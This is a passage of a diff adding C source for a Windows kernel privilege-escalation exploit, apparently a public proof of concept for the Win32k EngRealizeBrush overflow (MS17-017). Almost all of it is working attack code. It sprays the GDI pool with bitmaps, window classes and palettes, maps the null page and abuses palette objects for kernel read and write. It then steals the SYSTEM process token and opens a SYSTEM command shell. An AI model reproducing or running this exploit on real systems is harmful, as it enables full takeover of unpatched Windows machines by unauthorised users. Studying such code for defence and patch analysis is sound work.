+	// load ntoskrnl.exe
+
+	UINT ntos = (UINT)LoadLibrary("ntkrnlpa.exe");
+	// get address of exported PsInitialSystemProcess variable
+	UINT addr = (UINT)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
+	FreeLibrary((HMODULE)ntos);
+	UINT res = 0;
+	UINT ntOsBase = GetNTOsBase();
+	// subtract addr from ntos to get PsInitialSystemProcess offset from base
+	if (ntOsBase) {
+		ReadFromAddress(addr - ntos + ntOsBase, (UINT *)&res, sizeof(UINT) / sizeof(PALETTEENTRY));//0x169114
+	}
+	return res;
+}
+
+// Get EPROCESS for current process
+UINT PsGetCurrentProcess()
+{
+	UINT pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
+
+											  // walk ActiveProcessLinks until we find our Pid
+	LIST_ENTRY ActiveProcessLinks;
+	ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY));
+
+	UINT res = 0;
+
+	while (TRUE) {
+		UINT UniqueProcessId = 0;
+
+		// adjust EPROCESS pointer for next entry
+		pEPROCESS = (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT);
+		// get pid
+		ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (UINT *)&UniqueProcessId, sizeof(UINT) / sizeof(PALETTEENTRY));
+		// is this our pid?
+		if (GetCurrentProcessId() == UniqueProcessId) {
+			res = pEPROCESS;
+			break;
+		}
+		// get next entry
+		ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(UINT), (UINT *)&ActiveProcessLinks, sizeof(LIST_ENTRY) / sizeof(PALETTEENTRY));
+		// if next same as last, we reached the end
+		if (pEPROCESS == (UINT)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(UINT))
+			break;
+	}
+	return res;
+}
+
+
+void fengshui() {
+	HBITMAP bmp;
+	// we need 2 object 0x7F4
+	for (int y = 0; y < 2000; y++) {
+		//0x3A3 = 0xFe8
+		bmp = CreateBitmap(0x3A3, 1, 1, 32, NULL);
+		bitmaps[y] = bmp;
+	}
+
+	//Spray LpszMenuName User object in GDI pool. Ustx
+	// size 0x10+8
+	TCHAR st[0x32];
+	for (int s = 0; s < 2000; s++) {
+		WNDCLASSEX Class2 = { 0 };
+		wsprintf(st, "Class%d", s);
+		Class2.lpfnWndProc = DefWindowProc;
+		Class2.lpszClassName = st;
+		Class2.lpszMenuName = "Saif";
+		Class2.cbSize = sizeof(WNDCLASSEX);
+		if (!RegisterClassEx(&Class2)) {
+			printf("bad %d %d\r\n", s, GetLastError());
+			break;
+		}
+	}
+
+	for (int s = 0; s < 2000; s++) {
+		DeleteObject(bitmaps[s]);
+	}
+
+
+	for (int k = 0; k < 2000; k++) {
+		//0x1A6 = 0x7f0+8
+		bmp = CreateBitmap(0x1A6, 1, 1, 32, NULL);
+		bitmaps[k] = bmp;
+	}
+
+
+	HPALETTE hps;
+	LOGPALETTE *lPalette;
+	//0x1E3  = 0x7e8+8
+	lPalette = (LOGPALETTE*)malloc(sizeof(LOGPALETTE) + (0x1E3 - 1) * sizeof(PALETTEENTRY));
+	lPalette->palNumEntries = 0x1E3;
+	lPalette->palVersion = 0x0300;
+	// for allocations bigger than 0x98 its Gh08 for less its always 0x98 and the tag is Gla18
+	for (int k = 0; k < 2000; k++) {
+		hps = CreatePalette(lPalette);
+		if (!hps) {
+			printf("%s - %d - %d\r\n", "CreatePalette - Failed", GetLastError(), k);
+			//return;
+		}
+		hp[k] = hps;
+	}
+
+	TCHAR fst[0x32];
+	for (int f = 500; f < 750; f++) {
+		wsprintf(fst, "Class%d", f);
+		UnregisterClass(fst, NULL);
+	}
+
+}
+
+UINT GetAddress(BYTE *buf, UINT offset) {
+	BYTE bytes[4];
+	for (int i = 0; i < 4; i++) {
+		bytes[i] = buf[offset + i];
+	}
+	UINT addr = *(UINT *)bytes;
+	return addr;
+}
+
+int main(int argc, char *argv[]) {
+	HWND hwnd;
+	WNDCLASSEX Class = { 0 };
+	Class.lpfnWndProc = DefWindowProc;
+	Class.lpszClassName = "Class";
+	Class.cbSize = sizeof(WNDCLASSEX);
+
+	printf("    __  ________________      ____ ________\r\n");
+	printf("   /  |/  / ___<  /__  /     / __ <  /__  /\r\n");
+	printf("  / /|_/ /\__ \/ /  / /_____/ / / / /  / / \r\n");
+	printf(" / /  / /___/ / /  / /_____/ /_/ / /  / /  \r\n");
+	printf("/_/  /_//____/_/  /_/      \____/_/  /_/   \r\n");
+	printf("\r\n");
+	printf("      [*] By Saif (at) SensePost \r\n");
+	printf("	  Twitter: Saif_Sherei\r\n");
+	printf("\r\n");
+	printf("\r\n");
+
+	if (!RegisterClassEx(&Class)) {
+		printf("%s\r\n", "RegisterClass - Failed");
+		return 1;
+	}
+	hwnd = CreateWindowEx(NULL, "Class", "Test1", WS_VISIBLE, 0x5a1f, 0x5a1f, 0x5a1f, 0x5a1f, NULL, NULL, 0, NULL);
+	HDC hdc = GetDC(hwnd);
+
+	//0x10 is the magic number
+	printf("[*] Creating Pattern Brush Bitmap.\r\n");
+	HBITMAP bitmap = CreateBitmap(0x23, 0x1d41d41, 1, 1, NULL);
+	//HBITMAP bitmap = CreateBitmap(0x5aa, 0x11f, 1, 1, NULL);
+	if (!bitmap) {
+		printf("%s - %d\r\n", "CreateBitmap Failed.\r\n", GetLastError());
+		return 1;
+	}
+
+	//https://github.com/sam-b/HackSysDriverExploits/blob/master/HackSysNullPointerExploit/HackSysNullPointerExploit/HackSysNullPointerExploit.cpp
+	HMODULE hNtdll = GetModuleHandle("ntdll.dll");
+	//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
+	FARPROC tmp = GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
+	PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)tmp;
+	//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
+	//PVOID baseAddress = (PVOID)0x1;
+	PVOID baseAddress = (PVOID)0x1;
+	SIZE_T regionSize = 0xFF; //Probably enough, it will get rounded up to the next page size
+							  // Map the null page
+	NTSTATUS ntStatus = NtAllocateVirtualMemory(
+		GetCurrentProcess(), //Current process handle
+		&baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
+		0, //The number of high-order address bits that must be zero in the base address of the section view. Not a clue here
+		&regionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
+		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
+		PAGE_EXECUTE_READWRITE //All permissions
+	);
+
+	if (ntStatus != 0) {
+		printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
+		FreeLibrary(hNtdll);
+		return 1;
+	}
+
+	PVOID nullPointer = (PVOID)((UINT)0x4);
+	*(PUINT)nullPointer = (UINT)1;
+
+	// 
+	printf("[*] Creating Pattern Brush.\r\n");
+	HBRUSH hbrBkgnd = CreatePatternBrush(bitmap);
+
+	SelectObject(hdc, hbrBkgnd);
+	fengshui();
+	printf("[*] Triggering Overflow in Win32k!EngRealizeBrush.\r\n");
+	//__debugbreak();
+	PatBlt(hdc, 0x100, 0x10, 0x100, 0x100, PATCOPY);
+	HRESULT res;
+	bits = (BYTE*)malloc(0x6F8);
+	for (int i = 0; i < 2000; i++) {
+		res = GetBitmapBits(bitmaps[i], 0x6F8, bits);
+		if (res > 0x6F8 - 1) {
+			
+			hManager = bitmaps[i];
+			printf("[*] Manager Bitmap: %d\r\n", i);
+			break;
+		}
+	}
+	//__debugbreak();
+
+	//Get pFirstColor of adjacent Gh?8 XEPALOBJ Palette object
+	UINT pFirstColor = GetAddress(bits, 0x6F8 - 8);
+	printf("[*] Original Current Manager XEPALOBJ->pFirstColor: 0x%x\r\n", pFirstColor);
+
+	UINT cEntries = GetAddress(bits, 0x6F8 - 8 - 0x38);
+	printf("[*] Original Manager XEPALOBJ->cEntries: 0x%x\r\n", cEntries);
+
+	//BYTE *bytes = (BYTE*)&cEntries;
+	for (int y = 0; y < 4; y++) {
+		bits[0x6F8 - 8 - 0x38 + y] = 0xFF;
+	}
+	//__debugbreak();
+	SetBitmapBits((HBITMAP)hManager, 0x6F8, bits);
+	//__debugbreak();
+
+	res = GetBitmapBits((HBITMAP)hManager, 0x6F8, bits);
+	UINT uEntries = GetAddress(bits, 0x6F8 - 8 - 0x38);
+	printf("[*] Updated Manager XEPALOBJ->cEntries: 0x%x\r\n", uEntries);
+
+	UINT *rPalette;
+	rPalette = (UINT*)malloc((0x400 - 1) * sizeof(PALETTEENTRY));
+	memset(rPalette, 0x0, (0x400 - 1) * sizeof(PALETTEENTRY));
+	for (int k = 0; k < 2000; k++) {
+		UINT res = GetPaletteEntries(hp[k], 0, 0x400, (LPPALETTEENTRY)rPalette);
+		if (res > 0x3BB) {
+			printf("[*] Manager XEPALOBJ Object Handle: 0x%x\r\n", hp[k]);
+			hpManager = hp[k];
+			break;
+		}
+	}
+	//__debugbreak();
+	//for (int y = 0x3F0; y < 0x400; y++) {
+	//	printf("%04x ", rPalette[y]);
+	//}
+	//printf("\r\n");
+
+	UINT wAddress = rPalette[0x3FE];
+	printf("[*] Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", wAddress);
+
+	UINT tHeader = pFirstColor - 0x1000;
+	tHeader = tHeader & 0xFFFFF000;
+	printf("[*] Gh05 Address: 0x%04x.\r\n", tHeader);
+	//__debugbreak();
+	SetAddress(&tHeader);
+	
+	//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&tHeader);
+
+	UINT upAddress;
+	GetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (LPPALETTEENTRY)&upAddress);
+	printf("[*] Updated Worker XEPALOBJ->pFirstColor: 0x%04x.\r\n", upAddress);
+
+	UINT wBuffer[2];
+	for (int x = 0; x < 2000; x++) {
+		GetPaletteEntries((HPALETTE)hp[x], 0, 2, (LPPALETTEENTRY)wBuffer);
+		//Debug
+		//if (wBuffer != 0xcdcdcdcd) {
+		// Release
+		//if (wBuffer[1] == 0x35316847) {
+		if (wBuffer[1] >> 24 == 0x35) {
+			hpWorker = hp[x];
+			printf("[*] Worker XEPALOBJ object Handle: 0x%x\r\n", hpWorker);
+			printf("[*] wBuffer: %x\r\n", wBuffer[1]);
+			break;
+		}
+	}
+	
+	UINT gHeader[8];
+	//gHeader = (UINT*)malloc((0x4 - 1) * sizeof(PALETTEENTRY));
+	//GetPaletteEntries((HPALETTE)hpWorker, 0, 4, (LPPALETTEENTRY)gHeader);
+	ReadFromAddress(tHeader, gHeader, 8);
+	//__debugbreak();
+	UINT oHeader = pFirstColor & 0xFFFFF000;
+	printf("[*] Overflowed Gh05 Address: 0x%04x.\r\n", oHeader);
+	UINT oValue = oHeader + 0x1C;
+	//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oValue);
+	UINT value;
+	//GetPaletteEntries((HPALETTE)hpWorker, 0, 1, (LPPALETTEENTRY)&value);
+	//printf("[*] Value: 0x%04x.\r\n", value);
+	ReadFromAddress(oValue, &value, 1);
+
+	//printf("[*] Gh05 Object Header:\r\n");
+	//printf("    %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]);
+	//printf("    %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]);
+	//SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)&oHeader);
+	gHeader[2] = value;
+	gHeader[3] = 0;
+	gHeader[7] = value;
+	//SetPaletteEntries((HPALETTE)hpWorker, 0, 4, (PALETTEENTRY*)gHeader);
+	UINT oHeaderdata[8];
+	
+	ReadFromAddress(oHeader, oHeaderdata, 8);
+	printf("[*] Gh05 Overflowed Object Header:\r\n");
+	printf("    %04x %04x %04x %04x\r\n", oHeaderdata[0], oHeaderdata[1], oHeaderdata[2], oHeaderdata[3]);
+	printf("    %04x %04x %04x %04x\r\n", oHeaderdata[4], oHeaderdata[5], oHeaderdata[6], oHeaderdata[7]);
+
+	printf("[*] Gh05 Fixed Object Header:\r\n");
+	printf("    %04x %04x %04x %04x\r\n", gHeader[0], gHeader[1], gHeader[2], gHeader[3]);
+	printf("    %04x %04x %04x %04x\r\n", gHeader[4], gHeader[5], gHeader[6], gHeader[7]);
+	
+	SetAddress(&oHeader);
+	//__debugbreak();
+	WriteToAddress(gHeader, 8);
+	printf("[*] Fixed Overflowed Gh05 Object Header.\r\n");
+	//UINT uHeader[8];
+	//ReadFromAddress(oHeader, uHeader, 8);
+	//printf("[*] Gh05 Overflowed Fixed Object Header:\r\n");
+	//printf("    %04x %04x %04x %04x\r\n", uHeader[0], uHeader[1], uHeader[2], uHeader[3]);
+	//printf("    %04x %04x %04x %04x\r\n", uHeader[4], uHeader[5], uHeader[6], uHeader[7]);
+
+	// get System EPROCESS
+	UINT SystemEPROCESS = PsInitialSystemProcess();
+	//__debugbreak();
+	//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
+	UINT CurrentEPROCESS = PsGetCurrentProcess();
+	//__debugbreak();
+	//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
+	UINT SystemToken = 0;
+	// read token from system process
+	ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, &SystemToken, 1);
+	fprintf(stdout, "[*] Got System Token: %x\r\n", SystemToken);
+	// write token to current process
+	UINT CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
+	SetAddress(&CurProccessAddr);
+
+	WriteToAddress(&SystemToken, 1);
+	//__debugbreak();
+	printf("[*] Dropping in SYSTEM shell...\r\n\r\n");
+	// Done and done. We're System :)
+	system("cmd.exe");
+
+
+	//getchar();
+	for (int f = 0; f < 2000; f++) {
+		DeleteObject(bitmaps[f]);
+	}
+	for (int f = 0; f < 2000; f++) {
+		DeleteObject(hp[f]);
+	}
+	TCHAR fst[0x32];
+	for (int f = 0; f < 500; f++) {
+		wsprintf(fst, "Class%d", f);
+		UnregisterClass(fst, NULL);
+	}
+
+	for (int f = 751; f < 2000; f++) {
+		wsprintf(fst, "Class%d", f);
+		UnregisterClass(fst, NULL);
+	}
+
+	ReleaseDC(hwnd, hdc);
+	DeleteDC(hdc);
+	DeleteObject(hbrBkgnd);
+	DeleteObject(bitmap);
+	FreeLibrary(hNtdll);
+	//free(bitmaps);
+	//VirtualFree(&baseAddress, regionSize, MEM_RELEASE);
+	//DestroyWindow(hwnd);
+	return 0;
+}